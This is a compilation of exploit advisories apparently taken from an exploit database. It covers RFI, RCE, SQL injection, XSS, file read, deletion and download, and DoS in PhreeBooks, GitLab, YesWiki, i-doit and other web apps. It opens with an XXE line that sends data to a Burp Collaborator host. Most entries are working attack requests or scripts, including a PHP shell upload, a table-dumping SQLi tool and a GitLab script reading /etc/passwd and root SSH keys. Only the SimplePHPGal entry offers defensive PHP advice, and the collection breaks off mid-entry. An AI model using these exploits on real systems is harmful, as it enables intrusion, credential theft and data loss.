<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">
-----------------------------
-
SimplePHPGal 0.7 - Remote File Inclusion
# Title: SimplePHPGal 0.7 - Remote File Inclusion
# Author: h4shur
# Date: 2020-05-05
# Vendor Homepage: https://johncaruso.ca
# Software Link: https://johncaruso.ca/phpGallery/
# Software Link: https://sourceforge.net/projects/simplephpgal/
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Created with Simple PHP Photo Gallery" intext:"Created by John Caruso"

### Note:

* Another web application bug is the RFI bug, which can be very dangerous. RFI stands for Remote File Inclusion: the server directly executes a script loaded from a location the attacker controls. This security hole is created by programmer errors, so securing and preventing it requires good command of the programming language, control over the application's inputs and the use of capable firewalls.

* This bug is one of the most dangerous bugs, and the access an intruder can gain with it is the execution of a shell script; by running a shell script, the intruder obtains relatively complete access to the target site's server. In short, the hacker executes the shell by passing a link to a shell script in txt format to the vulnerable site's input.

* What's the solution? Check the file name supplied by the user against a list and include it only if it is in the list.
  Example:

<?php
$files = array('test.gif');
if (in_array($_GET['file'], $files)) {
    include($_GET['file']);
}
?>

* If you are a server administrator, turn off allow_url_fopen in the configuration file (php.ini).

* Or do it with the ini_set command. Only for (RFI):

<?php
// allow_url_fopen (and allow_url_include, which include() of a URL also needs)
// are PHP_INI_SYSTEM settings, so this call cannot change them at runtime;
// they have to be set to Off in php.ini.
ini_set('allow_url_fopen', 'Off');
?>

* We can use the strpos command to check whether the address starts with "http://"; if it does, the file will not be included (this can only block RFI):

<?php
// strpos() returns 0 when 'http://' sits at the very start of the string and
// false when it is absent, so the result must be compared with === false;
// the original "if (!$strpos)" treated position 0 as "not found".
$strpos = strpos($_GET['url'], 'http://');
if ($strpos === false) {
    include($_GET['url']);
}
?>

* Using str_replace we can strip the two characters "/" and "." from the given address:

<?php
$url = $_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?>

### Poc :

[+] site.com/image.php?img= [ PAYLOAD ]
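The allowlist approach from the note above, carried one step further as an added example (not part of this advisory and not SimplePHPGal's code): the requested name must be an allowlist entry and the resolved path must stay inside a fixed gallery directory, so neither a URL nor a traversal sequence can reach include(). The gallery directory and the allowlist entries are assumed values.

```php
<?php
// Added example: allowlist + directory containment for a user-selected include.
// $baseDir and the allowlist entries are assumed values, not SimplePHPGal's.

function resolve_allowed_file(string $requested, string $baseDir, array $allowlist): ?string
{
    // 1. Only exact allowlist entries are accepted: a URL such as
    //    "http://evil/shell.txt" or "../../etc/passwd" never matches.
    if (!in_array($requested, $allowlist, true)) {
        return null;
    }

    // 2. Resolve both paths and require the file to live under $baseDir.
    //    realpath() collapses ".." and follows symlinks, so a symlink that
    //    points outside the gallery is rejected as well.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;   // directory or file does not exist
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;   // resolved outside the gallery directory
    }

    return $full;
}

$allowed = ['test.gif', 'header.php'];   // constructed allowlist
$path = resolve_allowed_file($_GET['file'] ?? '', __DIR__ . '/gallery', $allowed);

if ($path === null) {
    http_response_code(400);
    exit('Invalid file');
}

include $path;
```

Even with this check in place, allow_url_include=Off in php.ini keeps include() from ever fetching a remote URL should another code path forget the check.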
-
PhreeBooks ERP 5.2.5 - Remote Command Execution
# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: https://www.phreesoft.com/
# Software Link: https://sourceforge.net/projects/phreebooks/
# Version: v5.2.4, v5.2.5
# Tested on: Xampp
# Credit: İsmail BOZKURT
-------------------------------------------------------------------------------------
There are no file extension controls on Image Manager (5.2.4) and on Backup Restore.
If an authorized user account is obtained, it is possible to run a malicious PHP file on the server.
--------------------------------------------------------------------------------------

One of the vulnerable files: (backup.php)
-----------------------------------------

RCE PoC (Upload Process)
--------------------------------------------------------------------------------------

POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *********************
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------39525038724866743160620170
Content-Length: 231
DNT: 1
Connection: close
Cookie: **************************************************

-----------------------------39525038724866743160620170
Content-Disposition: form-data; name="fldFile"; filename="shell.php"
Content-Type: text/php

<? phpinfo(); ?>
-----------------------------39525038724866743160620170--

Shell directory:
-------------------------------
- http://localhost/pblast/myFiles/backups/shell.php
-
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Description: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration

<?php
set_time_limit(0);

$host    = "192.168.0.14";
$start   = 100;
$end     = 30000;
$maxproc = 50;
$execute = 0;

echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);

for ($i = $start; $i <= $end; $i++) {
    $pid = @pcntl_fork();
    $execute++;
    if ($execute >= $maxproc) {
        while (pcntl_waitpid(0, $status) != -1) {
            $status  = pcntl_wexitstatus($status);
            $execute = 0;
            usleep(3000);
        }
    }
    if (!$pid) {
        echo $url . " checking $i\n";
        login($url, $i);
        flush();
        exit;
    }
}

function login($url, $key) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/PyxisUaMenu.htm?sessionId=' . $key . '&MAINFRM(444,-1,591)#');
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
    curl_setopt($ch, CURLOPT_TIMEOUT, 80);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, FALSE);
    $content = curl_exec($ch);
    curl_close($ch);

    if (preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content)) {
        die("\n\n[+][-]" . $url . "/PyxisUaMenu.htm?sessionId=" . $key . "&MAINFRM(444,-1,591)# => Found\n\n");
    }
}
-
i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://sourceforge.net/projects/i-doit/
# Version: v1.14.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------------------------------
Vulnerable Module    ---> Import Module
Vulnerable parameter ---> delete_import

-----------
PoC
-----------

POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ******************************
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.3
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-i-doit-Tenant-Id: 1
Content-Length: 30
DNT: 1
Connection: close
Cookie: PHPSESSID=bf21********************************68b8

delete_import=Type the filename, you want to delete from the server here
-
Online Clothing Store 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting
# Date: 2020-05-05
# Exploit Author: Sushant Kamble
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Vulnerable Page: Offers.php
# Parameter Vulnerable: Offer Detail

ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS. An admin user can add a malicious script to the offer page. When a normal user visits the page, the script gets executed.

# Exploit:

Open offer.php
Add the script below in Offer Detail:
<script>alert(document.cookie)</script>
Save
-
Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Date: 2020-05-03
# Author: Besim ALTINOK
# Vendor Homepage: https://www.bookedscheduler.com
# Software Link: https://sourceforge.net/projects/phpscheduleit/
# Version: v2.7.7
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description:
----------------------------------------------------------
Vulnerable Parameter: $tn
Vulnerable File: manage_email_templates.php

PoC
-----------

GET /booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/booked/Web/admin/manage_email_templates.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441; PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
-
Online Clothing Store 1.0 - 'username' SQL Injection
# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection
# Date: 2020-05-05
# Exploit Author: Sushant Kamble
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------
# Parameter Vulnerable: username

# Injected Request

POST /online%20Clothing%20Store/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/online%20Clothing%20Store/
Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7
Upgrade-Insecure-Requests: 1

txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login
-
webTareas 2.0.p8 - Arbitrary File Deletion
# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
# Software Link: https://sourceforge.net/projects/webtareas/files/
# Version: v2.0.p8
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description:
--------------------------------------------------------------------------------------
- print_layout.php is vulnerable. When you send the PoC code to the server and there is no such file on the server, you can see this error message:

<br /> <b>Warning</b>: unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip): No such file or directory in <b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b> on line <b>1303</b><br />

- So, here, you can delete a file with the unlink function.
- And I did try again with another file, which I deleted from the server.
--------------------------------------------------------------------------------------------

Arbitrary File Deletion PoC
---------------------------------------------------------------------------------------

POST /webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
Content-Type: multipart/form-data; boundary=---------------------------3678767312987982041084647942
Content-Length: 882
DNT: 1
Connection: close
Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730; PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
Upgrade-Insecure-Requests: 1

-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="action"

edit
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="desc"

<p>tester</p>
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="attnam1"


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="atttmp1"

--add the delete file name here--
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="sp"


-----------------------------3678767312987982041084647942--
-
GitLab 12.9.0 - Arbitrary File Read
# Exploit Title: GitLab 12.9.0 - Arbitrary File Read
# Google Dork: -
# Date: 2020-05-03
# Exploit Author: KouroshRZ
# Vendor Homepage: https://about.gitlab.com
# Software Link: https://about.gitlab.com/install
# Version: tested on gitlab version 12.9.0
# Tested on: Ubuntu 18.04 (but it's OS independent)
# CVE : -

#####################################################################################################
#
# Copyright (c) 2020, William Bowling of Biteable, a.k.a vakzz
# All rights reserved.
#
# Redistribution and use in source and compiled forms, with or without modification, are permitted
# provided that the following conditions are met:
#
#   * Redistributions of source code must retain the above copyright notice, this list of
#     conditions and the following disclaimer.
#
#   * Redistributions in compiled form must reproduce the above copyright notice, this list of
#     conditions and the following disclaimer in the documentation and/or other materials provided
#     with the distribution.
#
#   * Neither the name of William Bowling nor the names of Biteable, a.k.a vakzz may be used to
#     endorse or promote products derived from this software without specific prior written permission.
#
#####################################################################################################

# Exploit Title: automated exploit for Arbitrary file read via the UploadsRewriter when moving an issue in private gitlab server
# Google Dork: -
# Date: 05/03/2020
# Exploit Author: KouroshRZ
# Vendor Homepage: https://about.gitlab.com
# Software Link: https://about.gitlab.com/install
# Version: tested on gitlab version 12.9.0
# Tested on: Ubuntu 18.04 (but it's OS independent)
# CVE : -

import requests
import json
from time import sleep

# For debugging
proxies = {
    'http' : '127.0.0.1:8080',
    'https' : '127.0.0.1:8080'
}

session = requests.Session()

# config
host = 'http[s]://<gitlab-address>'
username = '<you-gitlab-username>'
password = '<your-gitlab-password>'

lastIssueUrl = ""


def loginToGitLab(username, password):
    initLoginUrl = '{}/users/sign_in'.format(host)
    initLoginResult = session.get(initLoginUrl).text

    temp_index_csrf_param_start = initLoginResult.find("csrf-param")
    temp_index_csrf_param_end = initLoginResult.find("/>", temp_index_csrf_param_start)
    csrf_param = initLoginResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]

    temp_index_csrf_token_start = initLoginResult.find("csrf-token")
    temp_index_csrf_token_end = initLoginResult.find("/>", temp_index_csrf_token_start)
    csrf_token = initLoginResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]

    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")

    submitLoginUrl = '{}/users/auth/ldapmain/callback'.format(host)
    submitLoginData = {
        'utf8=' : '✓',
        csrf_param : csrf_token,
        'username' : username,
        'password' : password,
    }
    submitLoginResult = session.post(submitLoginUrl, submitLoginData, allow_redirects=False)
    if submitLoginResult.status_code == 302 and submitLoginResult.text.find('redirected') > -1:
        print("[+] You'e logged in ...")


def createNewProject(projectName):
    initProjectUrl = '{}/projects/new'.format(host)
    initProjectResult = session.get(initProjectUrl).text

    temp_index_csrf_param_start = initProjectResult.find("csrf-param")
    temp_index_csrf_param_end = initProjectResult.find("/>", temp_index_csrf_param_start)
    csrf_param = initProjectResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]

    temp_index_csrf_token_start = initProjectResult.find("csrf-token")
    temp_index_csrf_token_end = initProjectResult.find("/>", temp_index_csrf_token_start)
    csrf_token = initProjectResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]

    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")

    tmp_index_1 = initProjectResult.find('{}/{}/\n'.format(host, username))
    tmp_index_2 = initProjectResult.find('value', tmp_index_1)
    tmp_index_3 = initProjectResult.find('type', tmp_index_2)
    namespace = initProjectResult[tmp_index_2 + 7 : tmp_index_3 - 2]

    createProjectUrl = '{}/projects'.format(host)
    createProjectData = {
        'utf8=' : '✓',
        csrf_param : csrf_token,
        'project[ci_cd_only]' : 'false',
        'project[name]' : projectName,
        'project[namespace_id]' : namespace,
        'project[path]' : projectName,
        'project[description]' : '',
        'project[visibility_level]' : '0'
    }
    createProjectResult = session.post(createProjectUrl, createProjectData, allow_redirects=False)
    if createProjectResult.status_code == 302:
        print("[+] New Project {} created ...".format(projectName))


def createNewIssue(projectName, issueTitle, file):
    global lastIssueUrl

    initIssueUrl = '{}/{}/{}/-/issues/new'.format(host, username, projectName)
    initIssueResult = session.get(initIssueUrl).text

    temp_index_csrf_param_start = initIssueResult.find("csrf-param")
    temp_index_csrf_param_end = initIssueResult.find("/>", temp_index_csrf_param_start)
    csrf_param = initIssueResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]

    temp_index_csrf_token_start = initIssueResult.find("csrf-token")
    temp_index_csrf_token_end = initIssueResult.find("/>", temp_index_csrf_token_start)
    csrf_token = initIssueResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]

    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")

    createIssueUrl = '{}/{}/{}/-/issues'.format(host, username, projectName)
    createIssueData = {
        'utf8=' : '✓',
        csrf_param : csrf_token,
        'issue[title]' : issueTitle,
        'issue[description]' : ''.format(file),
        'issue[confidential]' : '0',
        'issue[assignee_ids][]' : '0',
        'issue[label_ids][]' : '',
        'issue[due_date]' : '',
        'issue[lock_version]' : '0'
    }
    createIssueResult = session.post(createIssueUrl, createIssueData, allow_redirects=False)
    if createIssueResult.status_code == 302:
        print("[+] New issue for {} created ...".format(projectName))
        tmp_index_1 = createIssueResult.text.find("href")
        tmp_index_2 = createIssueResult.text.find("redirected")
        lastIssueUrl = createIssueResult.text[tmp_index_1 + 6 : tmp_index_2 - 2]
        print("[+] url of craeted issue : {}\n".format(lastIssueUrl))


def moveLastIssue(source, destination, file):
    # Get destination project ID
    getProjectIdUrl = '{}/{}/{}'.format(host, username, destination)
    getProjectIdResult = session.get(getProjectIdUrl).text
    tmpIndex = getProjectIdResult.find('/search?project_id')
    projectId = getProjectIdResult[tmpIndex + 19 : tmpIndex + 21]
    # print("Project : {} ID ----> {}\n".format(destination, projectId))

    # Get CSRF token for moving issue
    # initIssueMoveUrl = '{}/{}/{}/-/issues/{}'.format(host, username, source, issue)
    initIssueMoveUrl = lastIssueUrl
    initIssueMoveResult = session.get(initIssueMoveUrl).text

    temp_index_csrf_token_start = initIssueMoveResult.find("csrf-token")
    temp_index_csrf_token_end = initIssueMoveResult.find("/>", temp_index_csrf_token_start)
    csrf_token = initIssueMoveResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]

    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")

    # Move issue with associated CSRF token
    # moveIssueUrl = "{}/{}/{}/-/issues/{}/move".format(host, username, source, issue)
    moveIssueUrl = lastIssueUrl + "/move"
    moveIssueData = json.dumps({ "move_to_project_id" : int(projectId) })
    headers = {
        'X-CSRF-Token' : csrf_token,
        'X-Requested-With' : 'XMLHttpRequest',
        'Content-Type' : 'application/json;charset=utf-8'
    }
    moveIssueResult = session.post(moveIssueUrl, headers=headers, data=moveIssueData, allow_redirects=False)

    if moveIssueResult.status_code == 500:
        print("[!] Permission denied for {}".format(file))
    else:
        description = json.loads(moveIssueResult.text)["description"]
        tmp_index = description.find("/")
        fileUrl = "{}/{}/{}/{}".format(host, username, destination, description[tmp_index+1:-1])
        print("[+] url of file {}: \n".format(f, fileUrl))

        fileContentResult = session.get(fileUrl)
        if fileContentResult.status_code == 404:
            print("[-] No such file or directory : {}".format(f))
        else:
            print("[+] Content of file {} read from server ...\n\n".format(f))
            print(fileContentResult.text)
            print("\n****************************************************************************************\n")


if __name__ == "__main__":
    loginToGitLab(username, password)
    createNewProject("project_01")
    createNewProject("project_02")

    # Put the files you want to read from server here
    # The files on server should have **4 or more permission (world readable files)
    files = {
        '/etc/passwd',
        '/etc/ssh/sshd_config',
        '/etc/ssh/ssh_config',
        '/root/.ssh/id_rsa',
        '/var/log/auth.log'
        # ...
        # ...
        # ...
    }

    for f in files:
        createNewIssue("project_01", "issue01_{}".format(f), f)
        moveLastIssue("project_01", "project_02", f)
        sleep(3)
-
YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Date: 2020-04-25
# Exploit Author: coiffeur
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
# Version: YesWiki cercopitheque < 2020-04-18-1

import sys
import requests

DEBUG = 0


def usage():
    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi

SYNOPSIS:
    python sqli_2020.04.18.1.py <URL> [OPTIONS]...

DESCRIPTION:
    -lt,            list tables.
    -dt <TABLE>,    dump table.

AUTHOR:
    coiffeur
"""
    print(banner)


def parse(text):
    deli_l = 'ABCAABBCC|'
    deli_r = '|ABCAABBCC'
    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
        exit(-1)
    start = text.find(deli_l) + len(deli_l)
    end = start + text[start::].find(deli_r)
    return text[start:end]


def render(elements):
    print(elements)


def get_count(t_type, table_name=None, column_name=None):
    if t_type == 'table':
        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            data = parse(r.text)
    if t_type == 'column':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    if t_type == 'element':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    return int(data)


def list_tables():
    tables_count = get_count(t_type='table')
    print(f'[+] Tables found: {tables_count}')
    tables = []
    for i in range(0, tables_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            talbe = parse(r.text)
            print(f'\t{talbe}')
            tables.append(talbe)
    return tables


def list_columns(table_name):
    columns_count = get_count(t_type='column', table_name=table_name)
    print(f'[+] Columns found: {columns_count}')
    columns = []
    for i in range(0, columns_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            column = parse(r.text)
            if DEBUG > 0:
                print(f'\t{column}')
            columns.append(column)
    return columns


def dump_table(name):
    columns = list_columns(name)
    elements = [None] * len(columns)
    for i in range(0, len(columns)):
        elements_count = get_count(
            t_type='element', table_name=name, column_name=columns[i])
        if DEBUG > 0:
            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
        element = []
        for j in range(0, elements_count):
            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
            if DEBUG > 1:
                print(f'[DEBUG] {payload}')
            r = requests.get(url=f'{sys.argv[1]}{payload}')
            if r.status_code == 200:
                element.append(parse(r.text))
                if DEBUG > 0:
                    print(f'\t{element[-1]}')
        elements[i] = element
    render(elements)
    return elements


def main():
    if len(sys.argv) < 3:
        print(usage())
        exit(-1)
    if sys.argv[2] == '-lt':
        list_tables()
    if sys.argv[2] == '-dt':
        dump_table(sys.argv[3])


if __name__ == "__main__":
    main()
-
MPC Sharj 3.11.1 - Arbitrary File Download
# Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download
# Exploit Author : SajjadBnd
# Date : 2020-05-02
# Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip
# Tested on : Ubuntu 19.10
# Version : 3.11.1 Beta

############################
#
# [ DESCRIPTION ]
#
# MPC Sharj is a free open source script for creating sim card credit card's shop.
#
# [POC]
#
# Vulnerable file: download.php
# parameter : GET/ "id"
#
# 69: readfile($file);
# 55: $file = urldecode(base64_decode(strrev($file)));
# 53: $file = trim(strip_tags($_GET['id']));
#
# payload : [
# Steps:
#
#   1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=)
#   2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L)
#   3. your payload is ready ;D
#      http://localhost/download.php?id==Q2dzNXYw9yY0V2L
#
# ]
#

import requests
import os
from base64 import b64encode


def clear():
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])


def banner():
    print '''
##############################################################
##############################################################
######    MPC Sharj 3.11.1 Beta - Arbitrary File Download    #####
##############################################################
'''


def exploit():
    target = raw_input('[+] Target(http://example.com) => ')
    read_file = raw_input('[+] File to Read => ')
    read_file = b64encode(read_file)
    target = target + "/download.php?id" + read_file[::-1]
    r = requests.get(target, timeout=500)
    print "\n" + r.text


if __name__ == '__main__':
    clear()
    banner()
    exploit()
-
FlashGet 1.9.6 - Denial of Service (PoC)
# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
# Date: 2020-05-02
# Author: Milad Karimi
# Tested on: Kali Linux
# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
# Version: 1.9.6
# CVE : N/A

#!/usr/bin/python
from time import sleep
from socket import *

res = [
    '220 WELCOME!! :x\r\n',
    '331 Password required for %s.\r\n',
    '230 User %s logged in.\r\n',
    '250 CWD command successful.\r\n',
    '257 "%s/" is current directory.\r\n'  # <-- %s B0f :x
]

buf = 'A' * 332

s = socket(AF_INET, SOCK_STREAM)
s.bind(('0.0.0.0', 21))
s.listen(1)
print '[+] listening on [FTP] 21 ...\n'

c, addr = s.accept()
c.send(res[0])

user = ''
for i in range(1, len(res)):
    req = c.recv(1024)
    print '[*][CLIENT] %s' % (req)
    tmp = res[i]
    if(req.find('USER') != -1):
        req = req.replace('\r\n', '')
        user = req.split('\x20', 1)[1]
        tmp %= user
    if(req.find('PASS') != -1):
        tmp %= user
    if(req.find('PWD') != -1):
        tmp %= buf
    print '[*][SERVER] %s' % (tmp)
    c.send(tmp)

sleep(5)
c.close()
s.close()
print '[+] DONE'

# Discovered By : Milad Karimi
-
Car Park Management System 1.0 - Authentication Bypass
# Exploit Title: Car Park Management System 1.0 - Authentication Bypass
# Date: 2020-05-07
# Exploit Author: Tarun Sehgal
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------
# Parameter Vulnerable: phone and password

# Injected Request
# The request below will allow authentication bypass

POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: http://localhost
Connection: close
Referer: http://localhost/Car%20Park%20Management%20System/
Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd
Upgrade-Insecure-Requests: 1

phone=' or '1'='1&password=' or '1'='1&Submit=Log+In
-
Draytek VigorAP 1000C - Persistent Cross-Site Scripting
# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-05-07
# Vendor: https://www.draytek.com/
# Software: https://www.draytek.com/products/vigorap-903/
# CVE: N/A

Document Title:
===============
Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability

References (Source):
====================
